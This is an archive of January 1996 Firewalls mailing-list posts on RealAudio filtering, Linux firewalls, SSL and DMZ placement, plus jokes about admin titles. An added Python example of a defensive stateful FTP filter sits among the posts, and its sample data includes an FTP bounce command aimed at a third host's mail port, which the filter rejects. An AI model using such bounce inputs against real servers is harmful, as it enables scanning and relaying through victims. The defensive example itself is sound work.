From firewalls-owner Fri Jan 12 14:29:20 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id NAA05225 for firewalls-outgoing; Fri, 12 Jan 1996 13:45:08 -0800 (PST) Received: from tera.bctel.net (tera.bctel.net [204.174.66.253]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with ESMTP id NAA05173 for ; Fri, 12 Jan 1996 13:44:47 -0800 (PST) Received: (from nobody@localhost) by tera.bctel.net (8.7.1/8.7.1) id NAA24654; Fri, 12 Jan 1996 13:43:37 -0800 (PST) X-Authentication-Warning: tera.bctel.net: nobody set sender to using -f Received: from mocha.bctel.net(204.174.66.5) by tera via smap (V1.3) id sma024651; Fri Jan 12 13:43:23 1996 Received: (from murrell@localhost) by mocha.bctel.net (8.7.1/8.7.1) id NAA22353; Fri, 12 Jan 1996 13:43:33 -0800 (PST) Date: Fri, 12 Jan 1996 13:43:33 -0800 (PST) From: Brian Murrell Message-Id: <199601122143.NAA22353@mocha.bctel.net> To: murrell@bctel.net, firewalls@greatcircle.com, ken@bridge.com Subject: Re: Firewalls-Digest V5 #14 Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Content-MD5: 83/aS9KLWs8Kqgxxz1a2Og== Sender: firewalls-owner@GreatCircle.COM Precedence: bulk

> Has anyone reverse-engineered the R/A protocol, or deciphered F/W-1's
> enhancement (http://www.checkpoint.com/realaudio.html) enough to
> determine how it can be "safely" supported? And is the protocol
> proxyable (can know about a gateway), or will it only ever work with a
> filtering router or transparent proxy?

I started to, but didn't find it interesting enough to continue. I just wanted to ensure that they implemented it correctly and not just opening the suggested range to let it through.

The protocol should be proxyable. If FW-1 can figure out the src/destination addresses/ports so can a proxy. It would be more like a plug than a proxy (meaning it couldn't actually check the payload of the audio stream) however.

b.
-- Brian J. Murrell murrell@bctel.net BCTel Advanced Communications brian@ilinx.com Vancouver, B.C. brian@wimsey.com 604 454 5261 From firewalls-owner Fri Jan 12 14:42:18 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id NAA04953 for firewalls-outgoing; Fri, 12 Jan 1996 13:41:33 -0800 (PST) Received: from bchnetgw.bchydro.bc.ca (bchnetgw.BCHydro.BC.CA [142.52.88.1]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id NAA04948 for ; Fri, 12 Jan 1996 13:41:20 -0800 (PST) Received: by bchnetgw.bchydro.bc.ca (4.1/SMI-4.1) id AA28032; Fri, 12 Jan 96 13:40:05 PST Received: from bchgate.bchydro.bc.ca by bchnetgw via smap (V1.3mjr) id sma028019; Fri Jan 12 13:39:58 1996 Received: by BCHydro.bc.ca (4.1/SMI-4.1) id AA00171; Fri, 12 Jan 96 13:39:43 PST Received: from unknown by bchgate via smap (V1.3mjr) id sma000119; Fri Jan 12 13:39:11 1996 Received: by (5.x/SMI-SVR4) id AA15807; Fri, 12 Jan 1996 13:39:06 -0800 Date: Fri, 12 Jan 1996 13:39:06 -0800 From: David.Tsai@BCHydro.bc.ca (David Tsai) Message-Id: <9601122139.AA15807@> To: firewalls@greatcircle.com Subject: Re: "Title for Firewall Admin? X-Sun-Charset: US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk > > > The mail administrator is "postmaster" > > The web server admin is "webmaster" > > Is there such a title for a firewall administrator? > > Firemaster? > How about 'wallmaster'? 
-- David Tsai phone: (604) 623-4301 BC Hydro, Vancouver, Canada pager: (604) 686-1914 david.tsai@bchydro.bc.ca or dtsai@bchspd.wimsey.com From firewalls-owner Fri Jan 12 14:44:20 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id OAA08873 for firewalls-outgoing; Fri, 12 Jan 1996 14:29:08 -0800 (PST) Received: from gw1.att.com (gw1.att.com [192.20.239.133]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id OAA08866 for ; Fri, 12 Jan 1996 14:29:03 -0800 (PST) Received: from vodka.sse.att.com (vodka.gc.att.com) by ig1.att.att.com id AA04472; Fri, 12 Jan 96 17:25:56 EST Message-Id: <9601122225.AA04472@ig1.att.att.com> From: mdr@vodka.sse.att.com Subject: Re: "Title for Firewall Admin? To: CRISALLT@ADMIN.GMCC.AB.CA (Tim Crisall) Date: Fri, 12 Jan 1996 17:28:32 -0500 (EST) Cc: firewalls@greatcircle.com In-Reply-To: from "Tim Crisall" at Jan 12, 96 12:18:32 pm X-Mailer: ELM [version 2.4 PL23-upenn2.7] Mime-Version: 1.0 Content-Transfer-Encoding: 7bit Content-Type: text/plain; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk In support of the firewall admin's true responsibility: Security Administrator Network Security Administrator Others that are more colorful: SecMaster HackerBlaster NetMaster InternetOverlord PacketPasser PacketMaster BastionBrigadier DataDictator OutwitMitnick What I really want His supreme lordship, protector of the Corporate LAN. 
Mark Riggins Secure Systems Engineering AT&T Bell Labs PS: Sorry couldn't help myself

From firewalls-owner Fri Jan 12 14:57:56 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id NAA03055 for firewalls-outgoing; Fri, 12 Jan 1996 13:09:24 -0800 (PST) Received: from relay.ashton.csc.com (relay.ashton.csc.com [20.2.54.2]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id NAA03044 for ; Fri, 12 Jan 1996 13:09:12 -0800 (PST) Received: by relay.ashton.csc.com; id QAA16853; Fri, 12 Jan 1996 16:07:57 -0500 Received: from mccoy.ashton.csc.com(20.2.51.2) by relay.ashton.csc.com via smap (g3.0.1) id sma016849; Fri, 12 Jan 96 16:07:47 -0500 Received: (from ckostick@localhost) by mccoy.ashton.csc.com (8.6.9/8.6.9) id QAA01334; Fri, 12 Jan 1996 16:23:12 -0500 From: Chris Kostick Message-Id: <199601122123.QAA01334@mccoy.ashton.csc.com> Subject: Re: Linux as a firewall To: dana@nav.cc.tx.us (Dana Brewer) Date: Fri, 12 Jan 1996 16:23:12 -0500 (EST) Cc: firewalls@greatcircle.com In-Reply-To: from "Dana Brewer" at Jan 12, 96 10:20:14 am X-Mailer: ELM [version 2.4 PL24] Content-Type: text Sender: firewalls-owner@GreatCircle.COM Precedence: bulk

> I've noticed that a lot of people say they use Linux as part of their
> Internet firewall. But now I've had a company tell me that Linux isn't a
> true multi-tasking operating system, so it shouldn't be used as a
> firewall. What's the true story here? Ideally, in our situation, the
> bastion host would be the firewall, the WWW server, the ftp server, the
> Usenet news server, etc... Is this completely unrealistic?

Linux is as multitasking as any other UNIX system, so whoever you talked to, don't take advice from them again.

Linux can be used as a firewall. Depending on what you like it can do just filtering, can be a socks-based firewall, or you can run fwtk. It can run as a server for any of the services you mentioned.

Linux has many drawbacks for being a firewall machine, however. It takes a lot of work to get it 'just the way you want it'. It is not out of the box and it is not commercially supported. For the many organizations that need firewalls, they don't have the time for roll-your-own solutions. Linux also has an up-and-down life cycle. Sometimes the community will develop support for the latest technologies and Linux will be ahead of other OSs, and other times the vendors will have technology not yet incorporated into Linux.

It's an interesting solution for some people and totally unacceptable for others. But having Linux for firewall support is absolutely realistic.

-- chris

From firewalls-owner Fri Jan 12 14:59:20 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id OAA10860 for firewalls-outgoing; Fri, 12 Jan 1996 14:49:10 -0800 (PST) Received: from beach.sctc.com (beach.sctc.com [192.55.214.50]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with ESMTP id OAA10855 for ; Fri, 12 Jan 1996 14:49:04 -0800 (PST) Received: from beach.sctc.com (daemon@localhost) by beach.sctc.com (8.7.2/8.7.2) with ESMTP id QAA19237; Fri, 12 Jan 1996 16:47:44 -0600 (CST) Received: from sphinx.sctc.com (sphinx.sctc.com [172.17.192.3]) by beach.sctc.com (8.7.2/8.7.2) with ESMTP id QAA19229; Fri, 12 Jan 1996 16:47:43 -0600 (CST) Received: from shade.sctc.com (shade.sctc.com [172.17.192.48]) by sphinx.sctc.com (8.7.1/8.6.10) with SMTP id QAA23040; Fri, 12 Jan 1996 16:48:18 -0600 (CST) Received: (from smith@localhost) by shade.sctc.com (8.6.12/8.6.9) id QAA14497; Fri, 12 Jan 1996 16:48:20 -0600 Date: Fri, 12 Jan 1996 16:48:20 -0600 From: Rick Smith Message-Id: <199601122248.QAA14497@shade.sctc.com> To: firewalls@greatcircle.com Cc: smith@sctc.com, pf26376@ci.deere.com Subject: Re: Allow SSL through a firewall?
Sender: firewalls-owner@GreatCircle.COM Precedence: bulk

The problem I see with the proposed configuration is that the firewall can't/won't be able to apply any protection against attacks on incoming SSL connections. If the SSL application is breached due to a flaw in the server software (like what happened with ncsa httpd, syslog, etc, etc) then the attacker is on a machine *INSIDE* your security perimeter.

Another problem is that SSL (as usually implemented for supporting https) can only authenticate the server (which you already trust) and tells you nothing about the client. If SSL gave you client authentication data (which it doesn't) then the firewall could screen incoming SSL connections and only allow those from trustworthy sources. Instead, the server software has to go through a bunch of SSL transactions and then a bunch of http transactions via some series of web pages before you can tell if the client connection comes from someone you trust. If the connection comes from an attacker, he's had lots of time exchanging protocol with your server, and can exploit any bugs that may exist in the protocol software he uses.

Rick.
smith@sctc.com secure computing corporation From firewalls-owner Fri Jan 12 15:08:29 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id LAA27708 for firewalls-outgoing; Fri, 12 Jan 1996 11:38:26 -0800 (PST) Received: from chrivb01.cch.com (chrivb01.cch.com [199.14.11.100]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id LAA27703 for ; Fri, 12 Jan 1996 11:38:22 -0800 (PST) Received: by chrivb01.cch.com id AA29365; Fri, 12 Jan 96 13:37:14 CST Received: from mailhub.cch.com(165.181.21.17) by chrivb01 via smap (V1.3mjr) id sma029322; Fri Jan 12 13:37:00 1996 Received: by notes.cch.com (IBM OS/2 SENDMAIL VERSION 1.3.14/1.0) id AA0516; Fri, 12 Jan 96 13:38:30 -0600 Message-Id: <9601121938.AA0516@notes.cch.com> Received: from Computax with "Lotus Notes Mail Gateway for SMTP" id 91CA156EBE852890862562AF00684E06; Fri, 12 Jan 96 13:38:30 To: firewalls From: "Richard Giering Jr." Date: 12 Jan 96 13:09:53 Subject: Re: MSN proxy? Mime-Version: 1.0 Content-Type: Text/Plain Sender: firewalls-owner@GreatCircle.COM Precedence: bulk I guess I wasn't clear. Here's the message I received from one of our guys. >>MSN is opening up direct access to their data center. >>If possible I would like to access them using our Internet connection. >>There are some issues about how the traffic will make it through our firewall. >>Here is a response I received from them: >>It means that the protocol that MSN uses (called MPC) over >>TCP/IP must not be blocked by your firewall. If you have a >>filtering router on your LAN (it just blocks certain IP port numbers) >>you should be fine as long as messages to port 569 >>can get through. >> >>If your firewall is a proxy, it may attempt to understand the >>protocol. In this case, it will probably not forward MPC >>packets. >> >>I believe our firewall is a proxy. Any thoughts? I've asked if the port is TCP or UDP and if Netbios is required (how else is it going to find it?). No response to date. 
I want a proxy to both understand what's happening and control any information being delivered to MSN. One mailing list a while back indicated that information like files, directories and other PC's on the same net were still being sent to MSN across dial-up links. Rick Giering (Firewall Ranger) CCH. Inc ================== Forwarded Message Follows ==================== From: aroussos @ lia.co.za ("Dr. Angelo Roussos") @ Internet Date: 01/12/96 09:20:29 AM Subject: Re: MSN proxy? Hi, The microsoft network is at: www.msn.com. -------------------------------------------------------------------- Dr. Angelo Roussos Tel: +27(11)455-3945 Department of Anaesthesia University of the Witwatersrand Medical School Parktown, 2196 Johannesburg, Gauteng South Africa Director, Infoline/LIA Internet Access and Networking Tel: +27(11)315-3476 -------------------------------------------------------------------- From firewalls-owner Fri Jan 12 15:14:23 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id PAA11903 for firewalls-outgoing; Fri, 12 Jan 1996 15:03:13 -0800 (PST) Received: from toolbox.rutgers.edu (toolbox.rutgers.edu [128.6.134.37]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id PAA11872 for ; Fri, 12 Jan 1996 15:03:02 -0800 (PST) Received: (from binde@localhost) by toolbox.rutgers.edu (8.6.12+bestmx+oldruq+newsunq/8.6.12) id RAA06281; Fri, 12 Jan 1996 17:58:43 -0500 From: "Beth Binde" Message-Id: <9601121758.ZM6279@toolbox.rutgers.edu> Date: Fri, 12 Jan 1996 17:58:42 -0500 In-Reply-To: mdr@vodka.sse.att.com "Re: "Title for Firewall Admin?" (Jan 12, 17:28) References: <9601122225.AA04472@ig1.att.att.com> X-Mailer: Z-Mail (3.2.1 15feb95) To: mdr@vodka.sse.att.com, CRISALLT@ADMIN.GMCC.AB.CA (Tim Crisall) Subject: Re: "Title for Firewall Admin? Cc: firewalls@GreatCircle.COM Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Systems Goddess. It says it all. 
-- Beth E. Binde, Systems Programmer, Instructional Computing Initiative Rutgers University Computing Services, Piscataway, NJ 08855-0879 USA EMAIL: binde@nbcs.rutgers.edu VOICE: 908-445-5019 FAX: 908-445-2021 PGP Fingerprint: 40 5B 70 D3 75 27 08 D6 44 58 C3 62 57 E9 CA A2 From firewalls-owner Fri Jan 12 15:44:23 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id PAA12896 for firewalls-outgoing; Fri, 12 Jan 1996 15:21:46 -0800 (PST) Received: from nsco.network.com (nsco.network.com [129.191.1.1]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id PAA12878 for ; Fri, 12 Jan 1996 15:21:19 -0800 (PST) Received: from mnbp.network.com (ushub.network.com) by nsco.network.com (4.1/1.34) id AA10490; Fri, 12 Jan 96 17:22:30 CST Received: by mnbp.network.com with Microsoft Mail id <30F6EC79@mnbp.network.com>; Fri, 12 Jan 96 17:19:21 CST From: Greg Brennan To: firewalls mailing list Subject: FW: "Title for Firewall Admin? Date: Fri, 12 Jan 96 17:16:00 CST Message-Id: <30F6EC79@mnbp.network.com> X-Mailer: Microsoft Mail V3.0 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Phil Howard writes: >No idea. I just thought up: "netsentry" Thanks Phil. NetSentry(TM) is the name of the firewall that runs on Network Systems Corp (NSC) secure routers. We liked it too!! Greg Brennan Network Systems Corp. ---------- From: firewalls-owner To: billcurr Cc: firewalls Subject: Re: "Title for Firewall Admin? Date: January 12, 1996 09:34AM Bill Curr writes... > The mail administrator is "postmaster" > The web server admin is "webmaster" > Is there such a title for a firewall administrator? > And is there a list of these colorful "nom de nets" anywhere? No idea. I just thought up: "netsentry" -- Phil Howard KA9WGN +-------------------------------------------------+ Linux Consultant | The enemy of my enemy is NOT my friend... | Milepost Services | ...but he is a convenient ally! 
| phil@milepost.com +-------------------------------------------------+ From firewalls-owner Fri Jan 12 15:46:47 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id NAA04690 for firewalls-outgoing; Fri, 12 Jan 1996 13:37:18 -0800 (PST) Received: from mycroft.GreatCircle.COM (mycroft.greatcircle.com [198.102.244.35]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id NAA04685 for ; Fri, 12 Jan 1996 13:37:12 -0800 (PST) Received: by mycroft.GreatCircle.COM (8.6.10/SMI-4.1/Brent-951213) id NAA09339; Fri, 12 Jan 1996 13:34:16 -0800 Received: from uuneo.neosoft.com(206.109.1.3) by mycroft via smap (V1.3mjr) id sma009327; Fri Jan 12 13:33:40 1996 Received: from ris1.UUCP (ficc@localhost) by uuneo.neosoft.com (8.7.3/8.7.3) with UUCP id PAA03183 for GreatCircle.COM!Firewalls; Fri, 12 Jan 1996 15:13:40 -0600 (CST) Received: by ris1.nmti.com (smail2.5) id AA02050; 12 Jan 96 15:00:48 CST (Fri) Received: by sonic.nmti.com; id AA02105; Fri, 12 Jan 1996 14:31:58 -0600 From: peter@nmti.com (Peter da Silva) Message-Id: <9601122031.AA02105@sonic.nmti.com.nmti.com> Subject: Re: "Title for Firewall Admin? To: davek@MELITA.melita.com Date: Fri, 12 Jan 1996 14:31:58 -0600 (CST) Cc: shawn@aob.org, Firewalls@GreatCircle.COM In-Reply-To: <9601121905.AA43800@melupl.melita.com> from "Dave Kennedy" at Jan 12, 96 02:05:12 pm X-Mailer: ELM [version 2.4 PL23] Content-Type: text Sender: firewalls-owner@GreatCircle.COM Precedence: bulk > Remember "Ghostbusters?" There was the gatekeeper and the keymaster. There is no Dana. Only Zuul. Did the Keymaster have a cool name too? I named our web/news/mail proxy Zuul. The keymaster would be a good name for our new firewall. 
From firewalls-owner Fri Jan 12 15:47:11 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id PAA12338 for firewalls-outgoing; Fri, 12 Jan 1996 15:10:25 -0800 (PST) Received: from beach.sctc.com (beach.sctc.com [192.55.214.50]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with ESMTP id PAA12326 for ; Fri, 12 Jan 1996 15:10:18 -0800 (PST) Received: from beach.sctc.com (daemon@localhost) by beach.sctc.com (8.7.2/8.7.2) with ESMTP id RAA19704; Fri, 12 Jan 1996 17:05:58 -0600 (CST) Received: from sphinx.sctc.com (sphinx.sctc.com [172.17.192.3]) by beach.sctc.com (8.7.2/8.7.2) with ESMTP id RAA19700; Fri, 12 Jan 1996 17:05:58 -0600 (CST) Received: from shade.sctc.com (shade.sctc.com [172.17.192.48]) by sphinx.sctc.com (8.7.1/8.6.10) with SMTP id RAA23350; Fri, 12 Jan 1996 17:06:34 -0600 (CST) Received: (from smith@localhost) by shade.sctc.com (8.6.12/8.6.9) id QAA27420; Fri, 12 Jan 1996 16:30:31 -0600 Date: Fri, 12 Jan 1996 16:30:31 -0600 From: Rick Smith Message-Id: <199601122230.QAA27420@shade.sctc.com> To: firewalls@greatcircle.com Cc: smith@sctc.com, dannyc@gmap.leeds.ac.uk Subject: Re: Firewall design - routers and commercial kit Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Danny Cox asks: > Please give me some comeback here as I may be missing something. If I buy a >firewall from V-One or Secure Computing or MilkyWay or whoever I have a box >which runs proxies etc. We need to be in a position to run a WWW server, an >ftp server and some sort of server which will control ISDN/modems etc. We generally recommend that Sidewinder customers with FTP or Web data that's particularly at risk of attack host that data on a Sidewinder. That way you have the mandatory protection applied to the server, preventing access and corruption of your data. > Seems to me the obvious way (sort of) to do this is to use a screened >subnet arrangement. Ok .. fine. Am I duplicating kit doing this ? 
>That is, by using an exterior and interior router to create a screened >net off which would hang the commercial firewall etc, am I duplicating >the routing function of the commercial firewall or don't they have the >same level of control over routing as a CISCO would for example ? Many sites do this sort of thing, even with dual homed bastion hosts. Paranoia. I love it. If you're putting up external servers on standard Unix or NT hosts, put them *outside* the dual homed firewall, but inside relative to your outbound router. Rick. smith@sctc.com secure computing corporation From firewalls-owner Fri Jan 12 15:53:18 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id MAA01308 for firewalls-outgoing; Fri, 12 Jan 1996 12:38:13 -0800 (PST) Received: from gatekeeper.Bridge.COM (gatekeeper.bridge.com [167.76.159.11]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id MAA01303 for ; Fri, 12 Jan 1996 12:38:09 -0800 (PST) Received: (from mailproxy@localhost) by gatekeeper.Bridge.COM (8.6.12/8.6.9) id OAA10056; Fri, 12 Jan 1996 14:30:31 -0600 Received: from ignatz.bridge.com(167.76.24.6) by gatekeeper.Bridge.COM via smap (V1.0mjr) id sma010051; Fri Jan 12 14:30:26 1996 Received: from ernie.bridge.com by ignatz.bridge.com with SMTP id AA01210 (5.67b/IDA-1.5); Fri, 12 Jan 1996 14:43:34 -0600 Date: Fri, 12 Jan 1996 14:43:34 -0600 From: Ken Hardy Message-Id: <199601122043.AA01210@ignatz.bridge.com> To: murrell@bctel.net, firewalls@greatcircle.com Subject: Re: Firewalls-Digest V5 #14 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Brian Murrell spake: >Some points and questions. Real Audio can be handled by a "stateful packet >filter". Firewall-1 have recently put some filtering rules on their Web site >for FW-1 users to add to their rulebase to allow RealAudio in. I checked just >to make sure they weren't opening the big hole. 
>The datastream does seem to carry the return port in the clear much like FTP's data connection PORT command.

Has anyone reverse-engineered the R/A protocol, or deciphered F/W-1's enhancement (http://www.checkpoint.com/realaudio.html) enough to determine how it can be "safely" supported? And is the protocol proxyable (can know about a gateway), or will it only ever work with a filtering router or transparent proxy?

- KH

From firewalls-owner Fri Jan 12 15:59:24 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id PAA13497 for firewalls-outgoing; Fri, 12 Jan 1996 15:35:45 -0800 (PST) Received: from uuneo.neosoft.com (uuneo.neosoft.com [206.109.1.3]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with ESMTP id PAA13489 for ; Fri, 12 Jan 1996 15:35:36 -0800 (PST) Received: from ris1.UUCP (ficc@localhost) by uuneo.neosoft.com (8.7.3/8.7.3) with UUCP id RAA13458 for GreatCircle.COM!Firewalls; Fri, 12 Jan 1996 17:13:08 -0600 (CST) Received: by ris1.nmti.com (smail2.5) id AA05198; 12 Jan 96 17:05:04 CST (Fri) Received: by sonic.nmti.com; id AA21532; Fri, 12 Jan 1996 16:36:13 -0600 From: peter@nmti.com (Peter da Silva) Message-Id: <9601122236.AA21532@sonic.nmti.com.nmti.com> Subject: Re: "Title for Firewall Admin? To: mjr@v-one.com Date: Fri, 12 Jan 1996 16:36:13 -0600 (CST) Cc: Firewalls@GreatCircle.COM In-Reply-To: <199601122110.QAA08619@clark.net> from "Marcus J. Ranum" at Jan 12, 96 04:10:37 pm X-Mailer: ELM [version 2.4 PL23] Content-Type: text Sender: firewalls-owner@GreatCircle.COM Precedence: bulk

> I think most firewall admins are known by the title:
> "Is the Web down?"

The one I get is "Is the Internet down?"...
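Brian Murrell's and Ken Hardy's messages in the RealAudio thread above describe what a "stateful packet filter" has to do: read the return port that the control channel announces in the clear, much as FTP's PORT command does, and open only that one pinhole rather than "the suggested range". The RealAudio wire format is not reproduced here. The following is an added example, not FW-1's rule set and not code from either poster; it does the same job for FTP's documented PORT command (RFC 959), including the check Brian says he made: that the filter will not open a hole toward an address the client did not come from (the classic bounce). The addresses, ports, control lines and TTL are constructed for the example.

```python
import re

# RFC 959: "PORT h1,h2,h3,h4,p1,p2", port = p1*256 + p2
PORT_RE = re.compile(r"^PORT (\d{1,3}),(\d{1,3}),(\d{1,3}),(\d{1,3}),(\d{1,3}),(\d{1,3})\s*$")
FTP_DATA_PORT = 20   # server-side source port of an active-mode data connection


def parse_port_command(line):
    """Parse a PORT command into (ip, port); None for anything malformed,
    so that a bad control line can never open a hole."""
    m = PORT_RE.match(line)
    if not m:
        return None
    fields = [int(x) for x in m.groups()]
    if any(f > 255 for f in fields):
        return None
    h1, h2, h3, h4, p1, p2 = fields
    return "%d.%d.%d.%d" % (h1, h2, h3, h4), p1 * 256 + p2


class StatefulFilter:
    """Opens a data-channel pinhole only for what the control channel announced,
    and only for the full 4-tuple, not a port range."""

    def __init__(self, ttl=60):
        self.ttl = ttl
        self.pinholes = {}   # (src, sport, dst, dport) -> expiry time

    def observe_control(self, client_ip, server_ip, line, now):
        parsed = parse_port_command(line)
        if parsed is None:
            return False
        data_ip, data_port = parsed
        # The "big hole": honouring a PORT that names a third host (or a
        # privileged port) would let the filter be used to reach machines
        # the client itself could not reach.
        if data_ip != client_ip or data_port < 1024:
            return False
        self.pinholes[(server_ip, FTP_DATA_PORT, client_ip, data_port)] = now + self.ttl
        return True

    def allow_packet(self, src, sport, dst, dport, now):
        key = (src, sport, dst, dport)
        expiry = self.pinholes.get(key)
        if expiry is None:
            return False
        if now > expiry:
            del self.pinholes[key]   # pinholes die with the session, they are not permanent rules
            return False
        return True


# Constructed sample control-channel lines (not a real capture): client 10.1.1.5
# talking to FTP server 192.0.2.10.
SAMPLE_SESSION = [
    ("10.1.1.5", "192.0.2.10", "PORT 10,1,1,5,4,210"),   # legitimate: data back to client:1234
    ("10.1.1.5", "192.0.2.10", "PORT 10,1,1,99,0,25"),   # bounce attempt: third host, port 25
    ("10.1.1.5", "192.0.2.10", "PORT 10,1,1,5,4,999"),   # malformed: octet > 255
]


def run_sample(now=100):
    """Feed the sample session through the filter. Returns the per-line decisions
    and whether the matching data packets are admitted (right port, wrong port,
    and after the pinhole has expired)."""
    f = StatefulFilter(ttl=60)
    decisions = [f.observe_control(c, s, line, now) for c, s, line in SAMPLE_SESSION]
    data_ok = f.allow_packet("192.0.2.10", FTP_DATA_PORT, "10.1.1.5", 1234, now + 5)
    wrong_port = f.allow_packet("192.0.2.10", FTP_DATA_PORT, "10.1.1.5", 1235, now + 5)
    after_ttl = f.allow_packet("192.0.2.10", FTP_DATA_PORT, "10.1.1.5", 1234, now + 61)
    return decisions, data_ok, wrong_port, after_ttl


if __name__ == "__main__":
    print(run_sample())
```

As Brian notes, this is a plug rather than a proxy: the filter learns the address and port from the control channel and punches a hole for exactly that stream, but it never looks inside the data stream it then admits.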
From firewalls-owner Fri Jan 12 16:14:27 1996
From: peter@nmti.com (Peter da Silva)
Message-Id: <9601122234.AA21434@sonic.nmti.com.nmti.com>
Subject: Re: Allow SSL through a firewall?
To: jclark@picard.nib.com (Jay R. Clark)
Date: Fri, 12 Jan 1996 16:34:08 -0600 (CST)
Cc: dwl@hnc.com, firewalls@GreatCircle.COM
In-Reply-To: from "Jay R. Clark" at Jan 12, 96 11:02:04 am

> In our case we accumulate data from callers for our clients, the data is
> confidential/proprietary, if we leave it out on the sacrificial machine
> we run the risk of letting 4th parties obtain it and create one hella
> liability problem for ourselves and for our clients.

On the other hand, a web server is a helluva complex thing to have behind
the firewall.  What if someone compromises it (and I've seen some pretty
horrible holes in CGI scripts!)???

Best would be to put it on a separate firewalled subnet off your lobby, so
if someone breaks it they don't get carte blanche on your internal net.
From firewalls-owner Fri Jan 12 16:56:57 1996
Date: Fri, 12 Jan 1996 19:13:30 -0500 (EST)
From: "Paul D. Robertson"
To: Kent Landfield
Cc: Tim Crisall, firewalls@GreatCircle.COM
Subject: Re: "Title for Firewall Admin?
In-Reply-To: <199601122007.AA21580@ns1.sterling.com>

On Fri, 12 Jan 1996, Kent Landfield wrote:

> > > The mail administrator is "postmaster"
> > > The web server admin is "webmaster"
> > > Is there such a title for a firewall administrator?
> > > And is there a list of these colorful "nom de nets" anywhere?
> >
> > Guardian Of Data
>
> Doormat seems more appropriate. ;-)

ROTFL!

Actually, is there a consensus that adding a mail alias such as
gatekeeper@domain.root would serve as a useful point of contact device?
It seems to me that it wouldn't be a bad thing to have at the domain
level, not only to be more up-to-date than the WHOIS database, but also
to copy a domain security administrator, who would presumably want to
know what's going on when you have to send one of 'those' notes off to
root on some box within the domain.

Thoughts?

Paul "gatekeeper@I'm.not.telling.from.this.account" Robertson
-----------------------------------------------------------------------------
Paul D.
Robertson             "My statements in this message are personal opinions
proberts@clark.net     which may have no basis whatsoever in fact."
PSB#9280

From firewalls-owner Fri Jan 12 17:10:42 1996
Date: Fri, 12 Jan 1996 18:55:14 -0600
Message-Id: <199601130055.SAA25678@ion3.ionet.net>
To: firewalls@GreatCircle.COM
From: Tim Richardson
Subject: Scalability

My apologies for posting this in the Firewall news group.

Does anyone have information regarding server scalability in respect to
total users accessing a system and an increase in bandwidth?  I am trying
to determine how to represent the future growth plans in our organization
as we increase from a single T1 to multiples in order to handle additional
customers.  I also am trying to determine the growth impact on our web
server (i.e. CPU power, connections, etc.).  I cannot find this
information anywhere (of course I am probably not looking in the right
place).  Any help would be greatly appreciated.
Thanks in Advance

From firewalls-owner Fri Jan 12 17:25:42 1996
Date: Fri, 12 Jan 1996 17:09:13 -0800 (PST)
From: Dave Sroelov
To: firewalls@greatcircle.com
CC: DSROELOV@lifeguard.com
Message-Id: <960112170913.17ce6@lifeguard.com>
Subject: titles...

i always used to have my id read "Mr. System Manager, Sir"

so far, the best idea i have seen is

From firewalls-owner Fri Jan 12 17:34:46 1996
From: Phil Howard
Message-Id: <199601130017.SAA14246@colt.milepost.com>
Subject: Re: Linux as a firewall
To: dana@nav.cc.tx.us (Dana Brewer)
Date: Fri, 12 Jan 1996 18:17:05 -0600 (CST)
Cc: firewalls@GreatCircle.COM
In-Reply-To: from "Dana Brewer" at Jan 12, 96 10:20:14 am

Dana Brewer writes...

> I've noticed that a lot of people say they use Linux as part of their
> Internet firewall.  But now I've had a company tell me that Linux isn't a
> true multi-tasking operating system, so it shouldn't be used as a
> firewall.
> What's the true story here?  Ideally, in our situation, the
> bastion host would be the firewall, the WWW server, the ftp server, the
> Usenet news server, etc...  Is this completely unrealistic?

Anyone that says Linux is not a true multi-tasking system should not be
believed in anything they say.  Wanna bet it was a salesman that would
profit from your decision to purchase his product instead of rolling your
own?  I would not even consider whatever product that company sells, now,
unless it was just the "opinion" of a particular salesman, in which case
if you do decide to buy their product(s), I would find someone else to
make the sale with.

Anyone that says they don't know if Linux is a true multi-tasking system
or not can only be accused of not knowing about Linux.  But anyone who is
knowledgeable about systems and has examined Linux can only conclude that
it is real.  IMHO: it's more real than just about anything else out there.

What you should be asking is if Linux can be used to solve your Internet
security problems.  I cannot answer that.  Linux can be used to solve some
people's problems.  But it isn't everything to everyone.  There is not an
800 number to call and have a technician fly out that night to come fix
your system after it burns itself down.  Some manager types that wear ties
all day feel all comfy when there is a Tech "Support" line to call.  Me,
personally, I don't, because I'm the one that has had to call those lines,
and stay on hold, and get transferred around, put up with the multi-level
menus that don't have anything about my problem, and then get some bozo
